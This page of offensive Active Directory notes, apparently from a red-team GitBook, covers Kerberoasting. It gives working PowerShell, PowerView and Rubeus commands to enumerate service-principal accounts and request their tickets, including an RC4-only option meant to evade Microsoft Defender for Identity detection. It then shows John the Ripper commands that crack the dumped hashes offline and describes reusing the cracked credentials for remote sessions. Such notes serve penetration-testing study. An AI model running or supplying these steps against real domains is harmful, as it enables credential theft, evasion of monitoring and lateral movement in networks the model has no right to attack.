Kerberoasting

It is an attack against service accounts. Since the service tickets are encrypted with ntlm hash of service account and any domain user is able to request service ticket for any service on the machine, in this attack we request service ticket from the Ticket Granting Server in the DC and extract the ntlm hash of that service by bruteforcing with hashcat or john offline. Here we always target user accounts that are used as service accounts because regular service account passwords are generated by DC and quiet random and hard to bruteforce and also are changed frequenly automatically.

Find user accounts used as Service accounts

Using AD module

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Using PowerView

Get-DomainUser -SPN

Using rubeus to list kerberoast stats

Rubeus.exe kerberoast /stats

Use Rubeus to request a ST

Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

To avoid detections based on Encryption Downgrade for Kerberos EType(used by likes of MDI -0x17 stands for rc4-hmac), look for Kerberoastableaccounts that only support RC4_HMAC

Rubeus.exe kerberoast /stats /rc4opsec 
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

Kerberoast all possible accounts

Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Crack the ticket using john the ripper

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

After this create powershell credential object and use Enter-PSSession to access the computer where the user has admin rights or is able to access.

PreviousLateralMovement Nextdefense bypasses

Last updated 1 year ago

hashtagKerberoasting

hashtagFind user accounts used as Service accounts

Kerberoasting

Find user accounts used as Service accounts